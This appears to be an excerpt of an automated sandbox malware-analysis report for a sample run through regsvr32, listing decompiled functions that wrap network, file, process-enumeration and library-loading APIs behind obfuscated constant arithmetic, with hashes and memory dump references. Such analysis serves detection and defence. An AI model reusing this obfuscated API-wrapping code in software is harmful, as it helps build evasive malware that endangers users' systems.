                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: lstrcmpi
                                                                                                                • String ID: #-#$'BE$L:#
                                                                                                                • API String ID: 1586166983-27105818
                                                                                                                • Opcode ID: a0d71376c937979259f46d11f29c099a748033728b8adeb22975462810a77b95
                                                                                                                • Instruction ID: 538198d59d58e9fb5caad4e50eaae65b4c9fcca7f9a90ad4fcb747825640aa5c
                                                                                                                • Opcode Fuzzy Hash: a0d71376c937979259f46d11f29c099a748033728b8adeb22975462810a77b95
                                                                                                                • Instruction Fuzzy Hash: 141118B2C1520CFBCF04DFA4DA06AADBBB1FF54305F208188F914A6251D3B24B249F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00253D5B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 59%
                                                                                                                			E00253D5B(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a16, intOrPtr _a24, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t35;
				void* _t43;
				signed int _t45;
				long _t51;

				_push(_a32);
				_t51 = __edx;
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(0);
				_push(0);
				_push(_a4);
				_push(__edx);
				E0024C98A(_t35);
				_v12 = 0x9c1ed;
				_v12 = _v12 ^ 0x365fe830;
				_v12 = _v12 + 0x9fbc;
				_t45 = 0x5d;
				_v12 = _v12 / _t45;
				_v12 = _v12 ^ 0x009220cb;
				_v8 = 0x667c0f;
				_v8 = _v8 + 0xd261;
				_v8 = _v8 ^ 0x09cf929c;
				_v8 = _v8 + 0xffffda63;
				_v8 = _v8 ^ 0x09a515da;
				_v16 = 0x28dd03;
				_v16 = _v16 | 0x7771a862;
				_v16 = _v16 ^ 0x77784f4c;
				E00247F78(_t45, 0x2da3a2fe, _t45, 0x253, _t45, 0x943bbfe4);
				_t43 = InternetOpenW(0, _t51, 0, 0, 0); // executed
				return _t43;
			}










                                                                                                                0x00253d63
                                                                                                                0x00253d68
                                                                                                                0x00253d6a
                                                                                                                0x00253d6b
                                                                                                                0x00253d6e
                                                                                                                0x00253d6f
                                                                                                                0x00253d72
                                                                                                                0x00253d73
                                                                                                                0x00253d74
                                                                                                                0x00253d77
                                                                                                                0x00253d79
                                                                                                                0x00253d7e
                                                                                                                0x00253d88
                                                                                                                0x00253d91
                                                                                                                0x00253d9d
                                                                                                                0x00253da5
                                                                                                                0x00253dad
                                                                                                                0x00253db4
                                                                                                                0x00253dbb
                                                                                                                0x00253dc2
                                                                                                                0x00253dc9
                                                                                                                0x00253dd0
                                                                                                                0x00253dd7
                                                                                                                0x00253dde
                                                                                                                0x00253de5
                                                                                                                0x00253dfc
                                                                                                                0x00253e09
                                                                                                                0x00253e10

                                                                                                                APIs
                                                                                                                • InternetOpenW.WININET(00000000,?,00000000,00000000,00000000), ref: 00253E09
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: InternetOpen
                                                                                                                • String ID: 0_6$LOxw
                                                                                                                • API String ID: 2038078732-4015435269
                                                                                                                • Opcode ID: a7eb1b67cc8f1dcac96c1a2b0e42eeb4af4255eb802913b4a86a16440e2e2e03
                                                                                                                • Instruction ID: 1006d8bc8bbb2fb095da13534425a034a7d747dd0380e12ac4720544a90058ff
                                                                                                                • Opcode Fuzzy Hash: a7eb1b67cc8f1dcac96c1a2b0e42eeb4af4255eb802913b4a86a16440e2e2e03
                                                                                                                • Instruction Fuzzy Hash: 9B113471D00208BBDB64DEA6C84AC9FBFB8EF85700F208099F904A6150D3718B15DFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0024CAFE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 49%
                                                                                                                			E0024CAFE(WCHAR* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, long _a16, WCHAR* _a24, void* _a32, intOrPtr _a36, intOrPtr _a44, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t36;
				void* _t42;
				WCHAR* _t47;

				_push(_a48);
				_t47 = __ecx;
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__ecx);
				E0024C98A(_t36);
				_v32 = 0x13a0d;
				_v28 = 0xb8a00;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0xfb6d4e;
				_v16 = _v16 + 0xffff3e7e;
				_v16 = _v16 ^ 0x00ffee7b;
				_v12 = 0xa2ec0b;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x28b78b49;
				_v8 = 0x384820;
				_v8 = _v8 + 0xffffbc0c;
				_v8 = _v8 | 0x7a96533d;
				_v8 = _v8 ^ 0x7ab4c2f3;
				E00247F78(__ecx, 0x2da3a2fe, __ecx, 0x1ca, __ecx, 0x92120e72);
				_t42 = HttpOpenRequestW(_a32, _t47, _a24, 0, 0, 0, _a16, 0); // executed
				return _t42;
			}













                                                                                                                0x0024cb06
                                                                                                                0x0024cb0b
                                                                                                                0x0024cb0d
                                                                                                                0x0024cb10
                                                                                                                0x0024cb11
                                                                                                                0x0024cb14
                                                                                                                0x0024cb17
                                                                                                                0x0024cb18
                                                                                                                0x0024cb1b
                                                                                                                0x0024cb1c
                                                                                                                0x0024cb1f
                                                                                                                0x0024cb22
                                                                                                                0x0024cb25
                                                                                                                0x0024cb27
                                                                                                                0x0024cb28
                                                                                                                0x0024cb2d
                                                                                                                0x0024cb37
                                                                                                                0x0024cb43
                                                                                                                0x0024cb46
                                                                                                                0x0024cb49
                                                                                                                0x0024cb50
                                                                                                                0x0024cb57
                                                                                                                0x0024cb5e
                                                                                                                0x0024cb65
                                                                                                                0x0024cb69
                                                                                                                0x0024cb70
                                                                                                                0x0024cb77
                                                                                                                0x0024cb7e
                                                                                                                0x0024cb85
                                                                                                                0x0024cba1
                                                                                                                0x0024cbb7
                                                                                                                0x0024cbbe

                                                                                                                APIs
                                                                                                                • HttpOpenRequestW.WININET(?,?,00013A0D,00000000,00000000,00000000,000FFBDC,00000000), ref: 0024CBB7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: HttpOpenRequest
                                                                                                                • String ID: H8
                                                                                                                • API String ID: 1984915467-3618562657
                                                                                                                • Opcode ID: 87a21e86972055f17f44a7ab68bbd3dcdf7c118beff39969dd89e917131fbbc7
                                                                                                                • Instruction ID: 1f4151042c94b87dd68e07397f3fd3ce57f7344f28e1047208f5a62c299afc55
                                                                                                                • Opcode Fuzzy Hash: 87a21e86972055f17f44a7ab68bbd3dcdf7c118beff39969dd89e917131fbbc7
                                                                                                                • Instruction Fuzzy Hash: 1E21F472801249BBCF159F96CD09CDFBFB9EF85704F508189F91462220D3B69A21EFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0025ED7B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48serviceCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E0025ED7B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t33;
				int _t43;
				signed int _t45;
				signed int _t46;
				void* _t53;

				_push(_a8);
				_t53 = __ecx;
				_push(_a4);
				_push(__ecx);
				E0024C98A(_t33);
				_v16 = 0xcf28aa;
				_v16 = _v16 + 0xffff6a13;
				_v16 = _v16 ^ 0x00c8c4e4;
				_v12 = 0x49ff01;
				_t45 = 0xb;
				_v12 = _v12 / _t45;
				_t46 = 0x5d;
				_v12 = _v12 / _t46;
				_v12 = _v12 ^ 0x00001054;
				_v8 = 0x2a1e4a;
				_v8 = _v8 | 0x32e5c17e;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00072801;
				E00247F78(_t46, 0x616ae4, _t46, 0x1ec, _t46, 0x378734d);
				_t43 = CloseServiceHandle(_t53); // executed
				return _t43;
			}











                                                                                                                0x0025ed82
                                                                                                                0x0025ed85
                                                                                                                0x0025ed87
                                                                                                                0x0025ed8b
                                                                                                                0x0025ed8c
                                                                                                                0x0025ed91
                                                                                                                0x0025ed9b
                                                                                                                0x0025eda4
                                                                                                                0x0025edab
                                                                                                                0x0025edb7
                                                                                                                0x0025edbc
                                                                                                                0x0025edc4
                                                                                                                0x0025edcc
                                                                                                                0x0025edd4
                                                                                                                0x0025eddb
                                                                                                                0x0025ede2
                                                                                                                0x0025ede9
                                                                                                                0x0025eded
                                                                                                                0x0025ee04
                                                                                                                0x0025ee0d
                                                                                                                0x0025ee13

                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0025EE0D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 1725840886-1100367487
                                                                                                                • Opcode ID: 703c2c49735e2f09307ecac5439fd3e367e4715b3db01d8363efba17d125817d
                                                                                                                • Instruction ID: 7c8ef5946046a509ce4fd396256a0775366bebe8b68a2aea92f82e0033de63b6
                                                                                                                • Opcode Fuzzy Hash: 703c2c49735e2f09307ecac5439fd3e367e4715b3db01d8363efba17d125817d
                                                                                                                • Instruction Fuzzy Hash: 7B015B71D01208BFDB08DFA4C94A8DEBFB5EF45314F10C09AE914A7241E7B25B658F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0025FC9E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 78%
                                                                                                                			E0025FC9E(void* __ecx, void* __edx, intOrPtr _a4, struct tagPROCESSENTRY32W _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t35;
				int _t43;
				signed int _t45;
				void* _t50;

				_push(_a12);
				_t50 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0024C98A(_t35);
				_v16 = 0x6676ed;
				_v16 = _v16 + 0x5d25;
				_v16 = _v16 ^ 0x006eb8f2;
				_v12 = 0x39dc3c;
				_t45 = 0x2e;
				_v12 = _v12 / _t45;
				_v12 = _v12 + 0xffffb164;
				_v12 = _v12 ^ 0xe9b1b7d9;
				_v12 = _v12 ^ 0xe9be5d71;
				_v8 = 0x2a9e9b;
				_v8 = _v8 << 0xe;
				_v8 = _v8 << 2;
				_v8 = _v8 + 0x2aec;
				_v8 = _v8 ^ 0x9e97161a;
				E00247F78(_t45, 0xbd3f148a, _t45, 0x198, _t45, 0x9305a9de);
				_t43 = Process32NextW(_t50, _a8); // executed
				return _t43;
			}










                                                                                                                0x0025fca5
                                                                                                                0x0025fca8
                                                                                                                0x0025fcaa
                                                                                                                0x0025fcad
                                                                                                                0x0025fcb0
                                                                                                                0x0025fcb2
                                                                                                                0x0025fcb7
                                                                                                                0x0025fcc1
                                                                                                                0x0025fcca
                                                                                                                0x0025fcd1
                                                                                                                0x0025fcdd
                                                                                                                0x0025fce5
                                                                                                                0x0025fced
                                                                                                                0x0025fcf4
                                                                                                                0x0025fcfb
                                                                                                                0x0025fd02
                                                                                                                0x0025fd09
                                                                                                                0x0025fd0d
                                                                                                                0x0025fd11
                                                                                                                0x0025fd18
                                                                                                                0x0025fd2f
                                                                                                                0x0025fd3b
                                                                                                                0x0025fd41

                                                                                                                APIs
                                                                                                                • Process32NextW.KERNEL32(000073AC,006EB8F2,?,?,?,?,?,?,?,?,000073AC), ref: 0025FD3B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: NextProcess32
                                                                                                                • String ID: vf
                                                                                                                • API String ID: 1850201408-965054081
                                                                                                                • Opcode ID: 3791c30d4661ad78d5c7f557559a613565b336b39c31cd7733d2065f61184a5b
                                                                                                                • Instruction ID: f05cafa35c58423e8c4c34c24696abe71ab06710c77ef29c32f6bf3a3d7daa66
                                                                                                                • Opcode Fuzzy Hash: 3791c30d4661ad78d5c7f557559a613565b336b39c31cd7733d2065f61184a5b
                                                                                                                • Instruction Fuzzy Hash: 71115776D0130CBBCF54DFA5C90A8DEBBB5EB00314F20C088E92467251D3B18B649F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0024EC5D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E0024EC5D(struct _WIN32_FIND_DATAW* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t34;
				int _t41;
				struct _WIN32_FIND_DATAW* _t45;

				_push(_a8);
				_t45 = __ecx;
				_push(_a4);
				_push(__ecx);
				E0024C98A(_t34);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v32 = 0x35d0fc;
				_v28 = 0xd8e3c3;
				_v16 = 0x4b186c;
				_v16 = _v16 + 0xffffa127;
				_v16 = _v16 + 0xffffe137;
				_v16 = _v16 ^ 0x00439d27;
				_v12 = 0xede565;
				_v12 = _v12 << 8;
				_v12 = _v12 * 0x56;
				_v12 = _v12 ^ 0xeb0a2ea4;
				_v8 = 0xa4d72e;
				_v8 = _v8 ^ 0x3c190439;
				_v8 = _v8 + 0xc3f7;
				_v8 = _v8 ^ 0x3cbbf1a6;
				E00247F78(__ecx, 0xbd3f148a, __ecx, 0x22d, __ecx, 0x80cdcda7);
				_t41 = FindNextFileW(_a8, _t45); // executed
				return _t41;
			}













                                                                                                                0x0024ec64
                                                                                                                0x0024ec67
                                                                                                                0x0024ec69
                                                                                                                0x0024ec6d
                                                                                                                0x0024ec6e
                                                                                                                0x0024ec73
                                                                                                                0x0024ec7a
                                                                                                                0x0024ec83
                                                                                                                0x0024ec8a
                                                                                                                0x0024ec91
                                                                                                                0x0024ec98
                                                                                                                0x0024ec9f
                                                                                                                0x0024eca6
                                                                                                                0x0024ecad
                                                                                                                0x0024ecb4
                                                                                                                0x0024ecc8
                                                                                                                0x0024eccb
                                                                                                                0x0024ecd2
                                                                                                                0x0024ecd9
                                                                                                                0x0024ece0
                                                                                                                0x0024ece7
                                                                                                                0x0024ecf7
                                                                                                                0x0024ed03
                                                                                                                0x0024ed09

                                                                                                                APIs
                                                                                                                • FindNextFileW.KERNEL32(00439D27,?,?,?,?,?,?,?,?,00000019), ref: 0024ED03
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileFindNext
                                                                                                                • String ID: e
                                                                                                                • API String ID: 2029273394-2857170482
                                                                                                                • Opcode ID: de51f80a73a6695174499350245a793edf301c30511addfc37e5d64773dfada2
                                                                                                                • Instruction ID: eabb176e26cc1f66cbfad4352ce5a3b36fdafc82b277c041c2258f6a61f4cb4f
                                                                                                                • Opcode Fuzzy Hash: de51f80a73a6695174499350245a793edf301c30511addfc37e5d64773dfada2
                                                                                                                • Instruction Fuzzy Hash: CD1103B5C11208BBDB04DFA8D94A9AEBBB4EF40314F60C198E814B6261D3B55B15DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00244A9D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00244A9D(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t32;
				struct HINSTANCE__* _t39;
				WCHAR* _t43;

				_push(_a8);
				_t43 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024C98A(_t32);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = 0x1178a2;
				_v16 = 0x17846b;
				_v16 = _v16 | 0x3185073b;
				_v16 = _v16 + 0xffff538e;
				_v16 = _v16 ^ 0x3197b69f;
				_v12 = 0x16ba99;
				_v12 = _v12 ^ 0x02625a09;
				_v12 = _v12 ^ 0x25365766;
				_v12 = _v12 ^ 0x27431ab3;
				_v8 = 0xb183e3;
				_v8 = _v8 * 0x28;
				_v8 = _v8 | 0x77f20d23;
				_v8 = _v8 ^ 0x7ff151f0;
				E00247F78(__ecx, 0xbd3f148a, __ecx, 0x32, __ecx, 0xc1451b2a);
				_t39 = LoadLibraryW(_t43); // executed
				return _t39;
			}












                                                                                                                0x00244aa4
                                                                                                                0x00244aa7
                                                                                                                0x00244aa9
                                                                                                                0x00244aac
                                                                                                                0x00244aad
                                                                                                                0x00244aae
                                                                                                                0x00244ab3
                                                                                                                0x00244aba
                                                                                                                0x00244ac3
                                                                                                                0x00244aca
                                                                                                                0x00244ad1
                                                                                                                0x00244ad8
                                                                                                                0x00244adf
                                                                                                                0x00244ae6
                                                                                                                0x00244aed
                                                                                                                0x00244af4
                                                                                                                0x00244afb
                                                                                                                0x00244b02
                                                                                                                0x00244b16
                                                                                                                0x00244b19
                                                                                                                0x00244b20
                                                                                                                0x00244b30
                                                                                                                0x00244b39
                                                                                                                0x00244b3f

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: fW6%
                                                                                                                • API String ID: 1029625771-2497841860
                                                                                                                • Opcode ID: e9a96777d647297eb512e53d93b70e0f178870901659e9c10e62ae6a590f0ec8
                                                                                                                • Instruction ID: a982589cdbc7681f199d8aa9261e642a7fc14e557b2ea82d30fcc862ebef3efb
                                                                                                                • Opcode Fuzzy Hash: e9a96777d647297eb512e53d93b70e0f178870901659e9c10e62ae6a590f0ec8
                                                                                                                • Instruction Fuzzy Hash: 90114871C11208FFCB08DFA8DA469DEBBB4EF00311F60C188E415B6251D3704B148F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0025A50A Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 53%
                                                                                                                			E0025A50A(void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, intOrPtr _a24, long _a28, intOrPtr _a36, long _a40, intOrPtr _a44, WCHAR* _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t54;
				void* _t65;
				signed int _t66;
				signed int _t67;

				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E0024C98A(_t54);
				_v28 = 0xdc14f8;
				_v24 = 0xd964fd;
				_v20 = 0;
				_v16 = 0xcfd091;
				_v16 = _v16 << 0x10;
				_v16 = _v16 << 8;
				_v16 = _v16 ^ 0x910ec0c9;
				_v12 = 0x7a2ff2;
				_t66 = 0x43;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xd721c1d7;
				_v12 = _v12 ^ 0xd727192a;
				_v8 = 0x1eb7c0;
				_v8 = _v8 ^ 0x33199484;
				_t67 = 0x2d;
				_v8 = _v8 * 0xa;
				_v8 = _v8 / _t67;
				_v8 = _v8 ^ 0x05a21ecf;
				E00247F78(_t67, 0xbd3f148a, _t67, 0x203, _t67, 0x939ae237);
				_t65 = CreateFileW(_a48, _a28, _a40, 0, _a4, _a16, 0); // executed
				return _t65;
			}













                                                                                                                0x0025a511
                                                                                                                0x0025a516
                                                                                                                0x0025a519
                                                                                                                0x0025a51c
                                                                                                                0x0025a51f
                                                                                                                0x0025a520
                                                                                                                0x0025a523
                                                                                                                0x0025a526
                                                                                                                0x0025a529
                                                                                                                0x0025a52c
                                                                                                                0x0025a52f
                                                                                                                0x0025a532
                                                                                                                0x0025a536
                                                                                                                0x0025a537
                                                                                                                0x0025a53c
                                                                                                                0x0025a546
                                                                                                                0x0025a54f
                                                                                                                0x0025a552
                                                                                                                0x0025a559
                                                                                                                0x0025a55d
                                                                                                                0x0025a561
                                                                                                                0x0025a568
                                                                                                                0x0025a574
                                                                                                                0x0025a579
                                                                                                                0x0025a57e
                                                                                                                0x0025a585
                                                                                                                0x0025a58c
                                                                                                                0x0025a593
                                                                                                                0x0025a59e
                                                                                                                0x0025a5aa
                                                                                                                0x0025a5b3
                                                                                                                0x0025a5bb
                                                                                                                0x0025a5cb
                                                                                                                0x0025a5e4
                                                                                                                0x0025a5ea

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,?,00000000,D727192A,00D964FD,00000000), ref: 0025A5E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 94ead876fc1aef2e2499bc308fb4383a45bc4f9d75301f7fd0bd61c27d4a56db
                                                                                                                • Instruction ID: c49928cc00e96ae1e7d0195f7e5f6324601b84b2bc4415d4ff80407b1e675917
                                                                                                                • Opcode Fuzzy Hash: 94ead876fc1aef2e2499bc308fb4383a45bc4f9d75301f7fd0bd61c27d4a56db
                                                                                                                • Instruction Fuzzy Hash: FE21C372901108FBDF05DFE9D94A9DEBFB6EF48314F508149FA1866260D3728A609F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 002519B1 Relevance: 1.6, APIs: 1, Instructions: 69filenetworkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 62%
                                                                                                                			E002519B1(void* __ecx, DWORD* __edx, intOrPtr _a4, intOrPtr _a8, long _a12, void* _a16, void* _a20, intOrPtr _a24) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _v28;
				intOrPtr _v32;
				void* _t50;
				int _t63;
				signed int _t65;
				signed int _t66;
				DWORD* _t74;

				_push(_a24);
				_t74 = __edx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0024C98A(_t50);
				_v32 = 0xd7d875;
				asm("stosd");
				asm("stosd");
				_t65 = 0x3d;
				asm("stosd");
				_v16 = 0x1eee3f;
				_v16 = _v16 * 0x6e;
				_t66 = 0x22;
				_v16 = _v16 / _t65;
				_v16 = _v16 << 0xc;
				_v16 = _v16 ^ 0x7c61f49b;
				_v12 = 0xffced1;
				_v12 = _v12 << 0xd;
				_v12 = _v12 / _t66;
				_v12 = _v12 + 0x3034;
				_v12 = _v12 ^ 0x07583177;
				_v8 = 0xa5d24e;
				_v8 = _v8 * 0x37;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x0005d302;
				E00247F78(_t66, 0x2da3a2fe, _t66, 0x239, _t66, 0xd169d23b);
				_t63 = InternetReadFile(_a16, _a20, _a12, _t74); // executed
				return _t63;
			}













                                                                                                                0x002519b9
                                                                                                                0x002519bc
                                                                                                                0x002519be
                                                                                                                0x002519c1
                                                                                                                0x002519c4
                                                                                                                0x002519c7
                                                                                                                0x002519ca
                                                                                                                0x002519cd
                                                                                                                0x002519cf
                                                                                                                0x002519d4
                                                                                                                0x002519e3
                                                                                                                0x002519e8
                                                                                                                0x002519e9
                                                                                                                0x002519ec
                                                                                                                0x002519ed
                                                                                                                0x002519f8
                                                                                                                0x00251a00
                                                                                                                0x00251a01
                                                                                                                0x00251a06
                                                                                                                0x00251a0a
                                                                                                                0x00251a11
                                                                                                                0x00251a18
                                                                                                                0x00251a26
                                                                                                                0x00251a2e
                                                                                                                0x00251a35
                                                                                                                0x00251a3c
                                                                                                                0x00251a4e
                                                                                                                0x00251a51
                                                                                                                0x00251a55
                                                                                                                0x00251a59
                                                                                                                0x00251a69
                                                                                                                0x00251a7b
                                                                                                                0x00251a82

                                                                                                                APIs
                                                                                                                • InternetReadFile.WININET(D40CEA05,AAAB0961,007F5AF6,?,?,?,?,?,?,?,?,?,?,?,?,00CC5ADE), ref: 00251A7B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileInternetRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 778332206-0
                                                                                                                • Opcode ID: 9e02c36ec2ea3d9a539f4ca0ab1df4be54585172182fefbaf7bb3921e4b3c2ef
                                                                                                                • Instruction ID: 1c983ea7d7a2e91e8309219ff8b53fa62501d00f21b81c4632a613e56a2186ce
                                                                                                                • Opcode Fuzzy Hash: 9e02c36ec2ea3d9a539f4ca0ab1df4be54585172182fefbaf7bb3921e4b3c2ef
                                                                                                                • Instruction Fuzzy Hash: BC214271D01209BBEF05DFA5C84A8DEBBB5EF88310F108089EA14A6260D2759B25DF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

